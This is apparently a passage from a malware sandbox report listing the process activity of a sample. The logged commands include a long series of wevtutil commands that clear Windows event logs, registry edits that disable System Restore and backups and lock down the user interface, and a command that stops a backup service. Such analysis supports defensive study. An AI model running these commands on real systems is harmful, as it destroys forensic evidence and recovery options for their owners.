wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
1⤵
PID:432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Debug"
1⤵
PID:2904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Analytic"
1⤵
PID:888

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Debug"
1⤵
PID:716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Analytic"
1⤵
PID:4396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Analytic"
1⤵
PID:2804

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Debug"
1⤵
PID:3924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Analytic"
1⤵
PID:2720

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Analytic"
1⤵
PID:4992

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Operational"
1⤵
PID:436

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
1⤵
PID:1324

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
1⤵
PID:2280

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
1⤵
PID:4568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
1⤵
PID:1556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
1⤵
PID:2400

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"
1⤵
PID:220

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapMethods-Ttls/Operational"
1⤵
PID:4648
- C:\Windows\SysWOW64\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:2176

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
1⤵
PID:2588

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ESE/Operational"
1⤵
PID:4544

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ESE/IODiagnose"
1⤵
PID:2336

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
1⤵
PID:1872

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EDP-Audit-Regular/Admin"
1⤵
PID:3216

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
1⤵
PID:3688

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Power"
1⤵
PID:1292

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
1⤵
PID:2976

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Contention"
1⤵
PID:4288

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Operational"
1⤵
PID:512

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Admin"
1⤵
- Clears Windows event logs
PID:1704

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-Redir/Diagnostic"
1⤵
PID:3440

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-Dwm/Diagnostic"
1⤵
PID:2432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-Core/Diagnostic"
1⤵
PID:4472
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:1704

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-API/Diagnostic"
1⤵
PID:4600

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DucUpdateAgent/Operational"
1⤵
PID:2092

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
1⤵
PID:5116

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dot3MM/Diagnostic"
1⤵
PID:4820

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
1⤵
PID:396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
1⤵
PID:4988

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
1⤵
PID:876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dism-Cli/Analytic"
1⤵
PID:3012

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dism-Api/InternalAnalytic"
1⤵
PID:1160

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
1⤵
PID:1188

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
1⤵
PID:2076

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/Performance"
1⤵
PID:4852

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/General"
1⤵
PID:3524

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectComposition/Diagnostic"
1⤵
PID:3924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D9/Analytic"
1⤵
PID:1356
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:1156

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D12/Logging"
1⤵
PID:3328

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
1⤵
PID:1324

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
1⤵
PID:4420

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
1⤵
PID:3208

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
1⤵
PID:220

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
1⤵
PID:2648

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
1⤵
PID:2176

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
1⤵
PID:3236

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
1⤵
PID:4880

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
1⤵
PID:1640

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
1⤵
PID:4664

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
1⤵
PID:4596

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"
1⤵
PID:412

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
1⤵
PID:3744

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
1⤵
PID:2512

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
1⤵
PID:1108
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:4516
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:1108

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"
1⤵
PID:2628
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:1420

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"
1⤵
PID:4928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"
1⤵
PID:3780

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"
1⤵
PID:5000

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"
1⤵
PID:3640

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational"
1⤵
- Clears Windows event logs
PID:2904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"
1⤵
PID:2212

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"
1⤵
PID:972

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"
1⤵
PID:4440

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"
1⤵
PID:3368

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"
1⤵
PID:748

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
1⤵
PID:3176

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"
1⤵
PID:3680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"
1⤵
PID:4932

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"
1⤵
PID:4716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
1⤵
PID:456

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
1⤵
PID:468

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
1⤵
PID:4388

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
1⤵
PID:920

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"
1⤵
PID:952

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"
1⤵
PID:4664

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
1⤵
PID:1320

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
1⤵
PID:320

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Analytic"
1⤵
PID:3356

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"
1⤵
PID:816

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"
1⤵
PID:3772

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Operational"
1⤵
PID:3596

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Debug"
1⤵
PID:4668

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"
1⤵
PID:4956

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"
1⤵
PID:1292

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"
1⤵
PID:4288
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:2692

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"
1⤵
PID:512

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"
1⤵
PID:3568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"
1⤵
PID:4600

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
1⤵
PID:2092

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
1⤵
PID:5116

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"
1⤵
PID:4820

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"
1⤵
PID:4988
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:1112

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"
1⤵
PID:2828

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"
1⤵
PID:876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"
1⤵
PID:1160

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Operational"
1⤵
PID:2464

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Debug"
1⤵
PID:972

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"
1⤵
PID:888

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
1⤵
PID:1188

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
1⤵
PID:4396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
1⤵
PID:4892

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
1⤵
- Clears Windows event logs
PID:1604

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"
1⤵
PID:924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"
1⤵
PID:4036

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
1⤵
PID:692

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
1⤵
PID:4420

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"
1⤵
PID:3108

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"
1⤵
PID:2228

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"
1⤵
PID:2844

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"
1⤵
- Clears Windows event logs
PID:372

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"
1⤵
PID:4904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"
1⤵
PID:5108

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"
1⤵
PID:4052

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
1⤵
PID:1452

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
1⤵
- Clears Windows event logs
PID:952

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"
1⤵
PID:2748

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
1⤵
- Clears Windows event logs
PID:1668

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
1⤵
PID:1232

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
1⤵
- Clears Windows event logs
PID:1684

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-Bthmini/Operational"
1⤵
PID:1824

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"
1⤵
PID:1612

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"
1⤵
PID:3120

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
1⤵
PID:4616

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"
1⤵
PID:4516

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
1⤵
PID:780

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
1⤵
PID:1420

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
1⤵
PID:1564

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Performance"
1⤵
PID:1140

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Diagnostic"
1⤵
PID:4060

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/L2CAP"
1⤵
PID:4804

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
1⤵
PID:3012

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
1⤵
PID:1160

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
1⤵
PID:4616

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
1⤵
PID:2464
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"
1⤵
PID:716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
1⤵
PID:4144

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
1⤵
PID:792
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:1252

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"
1⤵
PID:1252

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"
1⤵
PID:5032

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"
1⤵
PID:3828

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"
1⤵
PID:3364

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"
1⤵
PID:1792

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"
1⤵
PID:948

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
1⤵
PID:1556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
1⤵
PID:1772

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"
1⤵
PID:4544

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Operational"
1⤵
PID:112

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"
1⤵
PID:3904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"
1⤵
PID:2196

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
1⤵
PID:1320

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
1⤵
PID:4596

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
1⤵
PID:5076

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
1⤵
PID:2976

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"
1⤵
PID:320

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppSruProv"
1⤵
PID:816

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-IO/Operational"
1⤵
PID:2548

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
1⤵
PID:5104
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
  2⤵
  PID:4344

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Interrupt-Steering/Diagnostic"
1⤵
PID:3336

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Analytic"
1⤵
PID:1320

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-IoTrace/Diagnostic"
1⤵
PID:4336

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Operational"
1⤵
PID:1232
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
  2⤵
  PID:4336

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
1⤵
PID:4344

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
1⤵
PID:4564

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Pdc/Diagnostic"
1⤵
PID:5004

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
1⤵
PID:1608

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration"
1⤵
PID:1452

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration Diagnostic"
1⤵
PID:2680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Device Enumeration Diagnostic"
1⤵
PID:4052

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Boot Diagnostic"
1⤵
- Clears Windows event logs
PID:2696

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Diagnostic"
1⤵
PID:1772

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Pep/Diagnostic"
1⤵
PID:4880

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"
1⤵
PID:3568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"
1⤵
PID:3424

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"
1⤵
- Clears Windows event logs
PID:2432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
1⤵
PID:3352

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"
1⤵
PID:2796

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"
1⤵
PID:1112

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"
1⤵
PID:4928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"
1⤵
PID:876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"
1⤵
PID:4392

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"
1⤵
PID:3184

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
1⤵
PID:4556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Watchdog"
1⤵
PID:2260

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
1⤵
- Clears Windows event logs
PID:928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
1⤵
PID:4084

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"
1⤵
PID:4440

